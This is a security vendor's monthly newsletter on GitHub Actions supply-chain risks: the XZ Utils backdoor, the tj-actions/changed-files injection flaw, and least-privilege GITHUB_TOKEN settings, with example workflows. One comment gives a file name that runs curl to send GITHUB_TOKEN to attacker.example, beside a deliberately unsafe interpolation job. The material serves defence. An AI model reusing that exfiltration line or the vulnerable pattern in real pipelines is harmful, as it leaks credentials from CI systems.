March 2024 at StepSecurity
StepSecurity
Secure your GitHub Actions with StepSecurity: Your Trusted CI/CD Security Partner
The end of the first quarter has brought a new wave of serious supply chain attacks and vulnerabilities to the industry. At StepSecurity, we spent March fortifying the defenses of our enterprise customers and the open-source community against these attacks, and received some great feedback along the way.
Read on to learn what has been happening at StepSecurity in March 2024.
Webinar Announcement: "Live Analysis of Backdoored XZ Utils Build Process with StepSecurity Harden-Runner"
The recent XZ Utils backdoor supply chain attack has sent shockwaves through the industry, highlighting the pressing need for solid security measures in CI/CD pipelines.
In our upcoming webinar, the StepSecurity team will perform a live analysis of the backdoored XZ build process with Harden-Runner and observe the injection of the backdoor as it happens. The webinar will show why runtime security monitoring during the build process matters and how it can be pivotal in detecting and mitigating supply chain attacks like the XZ Utils incident.
You can register for the webinar here: https://www.dhirubhai.net/events/liveanalysisofbackdooredxzutils7184238307239759873/theater/
For more context, check out our latest blog post on the analysis. It includes an overview of the XZ Utils build process and an analysis of that build with Harden-Runner, and explains how runtime security helps detect supply chain attacks of this kind.
We are updating the blog post as we find new insights, so stay tuned!
Harden-Runner Defends Against Arbitrary Command Execution in tj-actions/changed-files GitHub Action
Recently, a security researcher reported an arbitrary command execution vulnerability in the popular tj-actions/changed-files GitHub Action, which is used by 12,700 public repositories and many private enterprise repositories. This command injection vulnerability can lead to stolen CI/CD credentials, compromised proprietary source code, and tampered release builds with injected backdoors.
Our blog post describes how StepSecurity Harden-Runner has enabled organizations to fortify their GitHub Actions environment against this vulnerability. Here is what one of our enterprise customers had to say about it:
"We got this in pretty much all our repositories recently: https://securitylab.github.com/advisories/GHSL-2023-271_changed-files/. It's used a lot everywhere. Instantly knew StepSecurity was protecting me."
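The following workflow is an added example written for this newsletter; it is not code from the StepSecurity blog post or from the GHSL advisory. It assumes the injection path is the general GitHub Actions script-injection pattern (an action output containing attacker-controlled file names interpolated into a `run:` script) and shows the same job twice: once with the unsafe interpolation, and once hardened with the output passed through an environment variable and with Harden-Runner in block mode so that any command injection that does occur cannot exfiltrate credentials to an unlisted host. The workflow name, version pins, and allowed endpoints are illustrative; check the advisory for affected and patched releases of the action.

```yaml
# Added example, not from the StepSecurity post or the GHSL advisory.
# Hypothetical workflow: unsafe interpolation of an action output versus
# a hardened job with env-var passing and Harden-Runner egress blocking.
name: changed-files-demo
on: [pull_request]

permissions:
  contents: read

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - id: changed
        uses: tj-actions/changed-files@v40   # illustrative pin; see the advisory

      # UNSAFE: the ${{ }} expression is substituted into the script text
      # before bash runs it. A pull request that adds a file named, say,
      #   $(curl -d "$GITHUB_TOKEN" https://attacker.example)
      # turns that file name into a command the runner executes.
      - run: |
          for f in ${{ steps.changed.outputs.all_changed_files }}; do
            echo "changed: $f"
          done

  hardened:
    runs-on: ubuntu-latest
    steps:
      # Harden-Runner goes first so every later step's outbound traffic is
      # policed. With egress-policy: block, connections to hosts not on the
      # allow list are refused and reported, so a stolen token has nowhere
      # to go even if a step is compromised.
      - uses: step-security/harden-runner@v2
        with:
          egress-policy: block
          disable-sudo: true
          allowed-endpoints: >
            api.github.com:443
            github.com:443
            objects.githubusercontent.com:443

      - uses: actions/checkout@v4
        with:
          persist-credentials: false   # keep GITHUB_TOKEN out of .git/config
      - id: changed
        uses: tj-actions/changed-files@v40   # illustrative pin; see the advisory

      # SAFE: the output reaches bash as the *value* of $CHANGED. Bash never
      # parses file names as script, so metacharacters are inert.
      - env:
          CHANGED: ${{ steps.changed.outputs.all_changed_files }}
        run: |
          printf '%s\n' "$CHANGED" | tr ' ' '\n' | while IFS= read -r f; do
            echo "changed: $f"
          done
```

The split of the same work into `vulnerable` and `hardened` jobs is only for side-by-side reading; in a real repository keep the hardened form. Running Harden-Runner in `egress-policy: audit` first and promoting to `block` once the observed endpoints are reviewed is the usual rollout path.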
StepSecurity GitHub Actions Advisor Featured in DevOps Paradox Podcast
Thanks to the DevOps Paradox Podcast team for featuring StepSecurity GitHub Actions Advisor! You can watch the full YouTube video here: https://www.youtube.com/watch?v=wc-30eJsqCE&t=1146s
Here is what they had to say about the platform:
"For an enterprise, using a random plugin by a random person is very dangerous. If you're using GitHub Actions, now you have a way to assess actions and figure out if they're okay to use or not."
GITHUB_TOKEN: How It Works and How to Secure Automatic GitHub Action Tokens
GITHUB_TOKEN is easy to over-privilege, and an over-privileged token turns any compromised step into a way to push code, publish releases, or read other secrets. Read our blog post on GITHUB_TOKEN to learn how the token is issued, the risks of using it carelessly, and how to set least-privilege token permissions.
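The following workflow is an added example for this newsletter, not code from the StepSecurity GITHUB_TOKEN post. It shows the weak setting (a permissive workflow-wide grant, or no `permissions` block at all on a repository whose default is read/write) beside the corrected form: nothing granted by default, with each job requesting only the scopes it needs. The workflow name and `make` targets are hypothetical.

```yaml
# Added example, not from the StepSecurity post.
# Hypothetical release workflow with least-privilege GITHUB_TOKEN scopes.
name: release-demo
on:
  push:
    branches: [main]

# Weak setting (do not use):
#   permissions: write-all
# or omitting the block entirely on a repository still using the
# permissive "Read and write" default. Either gives every step, and every
# third-party action those steps call, a token that can push code, create
# releases, and write packages.

# Corrected: grant nothing at the workflow level; jobs opt in below.
permissions: {}

jobs:
  test:
    runs-on: ubuntu-latest
    permissions:
      contents: read            # checkout only; cannot push, tag, or release
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false   # token is not stored in .git/config
      - run: make test

  release:
    needs: test
    runs-on: ubuntu-latest
    permissions:
      contents: write           # the one scope creating a release needs
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
      - run: make dist
      # The token is handed to gh through the environment, never spliced
      # into the script text, and only this job holds a write-capable token.
      - env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: gh release create "v${GITHUB_RUN_NUMBER}" --generate-notes dist/*
```

Because `permissions: {}` at the top removes every scope, a job that forgets to declare what it needs fails loudly on its first API call rather than silently running with a write-all token; that failure is the point of the design.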
StepSecurity's Latest Usage
Thank you for reading our March '24 newsletter. Stay tuned for more and follow us for daily updates.
Senior Product Security Engineer | Application Security Expert | Speaker
11 months ago: Amazing! It was great to chat face to face.